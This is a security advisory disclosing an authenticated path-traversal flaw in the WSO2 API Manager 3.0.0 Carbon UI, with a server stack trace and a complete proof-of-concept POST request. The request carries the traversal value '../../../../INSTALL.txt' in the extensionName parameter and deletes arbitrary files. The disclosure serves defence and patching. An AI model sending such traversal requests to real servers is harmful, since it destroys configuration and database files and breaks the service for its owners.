Document Title:
===============
WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )


##CVE not assigned yet
##Author : Raki Ben Hamouda
##Security Update : https://apim.docs.wso2.com/en/latest/


Common Vulnerability Scoring System:
====================================
8.5


Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote Arbitrary file delete vulnerability has been discovered in the
official WSO2 API Manager Carbon UI product .
The security vulnerability allows a remote attacker with low privileges to
perform authenticated application requests
and to delete arbitrary System files.

The vulnerability is located in the
`/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the
`extensionName` parameter
of the extension we want to delete. Remote attackers are able to delete
arbitrary files as configuration files ,database(.db) files
via authenticated POST method requests with a crafted String arbitrary
traversal files names in  "extensionName" .

The security risk of the arbitrary delete vulnerability is estimated as
High with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the Path traversal vulnerability requires a low privilege
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

===============================

Error Generated by Server in case of file not found from 'logfile' (
broughts my atttention ...)

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove
extension.
org.apache.axis2.AxisFault: File does not exist:
E:\api-wso2\bin\..\repository\d
eployment\server\registryextensions\commons-dir
        at
org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j
ava:531) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.apache.axis2.description.OutInAxisOperationClient.handleResponse(
OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO
peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out
InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.apache.axis2.client.OperationClient.execute(OperationClient.java:
149) ~[axis2_1.6.1.wso2v38.jar:?]
        at
org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem
oveExtension(ResourceAdminServiceStub.java:5954)
~[org.wso2.carbon.registry.exte
nsions.stub_4.7.13.jar:?]
        at
org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.
deleteExtension(ResourceServiceClient.java:137)
[org.wso2.carbon.registry.extens
ions.ui_4.7.13.jar:?]
        at
org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS
ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
        at
org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t
omcat_9.0.22.wso2v1.jar:?]

*Error displayed in Web browser with body request:

<script type="text/javascript">
    CARBON.showErrorDialog("File does not exist:
E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>



=============================

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName


Server version
 3.0.0


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low
privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


1-Attacker must have access to the Extension component(List ,Add ,Delete
extensions )
2-attacker  uploads any file .jar extension
3-attacker intercepts the request that follows and modifies the parameter
with traversal string:

--- PoC Session Logs [POST] ---

POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer:
https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B;
requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add;
region1_configure_menu=none; region3_registry_menu=visible;
region4_monitor_menu=none; region5_tools_menu=none;
current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523;
MSG15780931689110.08734318816834985=true;
MSG15780932448520.1389658752202746=true;
MSG15780934638710.11615678726759582=true;
MSG15780941514590.39351165459685944=true;
MSG15780941548760.1587776077002745=true;
MSG15780944563770.9802725740232142=true;
MSG15780944882480.28388839177015013=true;
MSG15780945113520.5908842754830942=true; menuPanel=visible;
menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt

 ---------------Returned Headers in Response------------------

HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server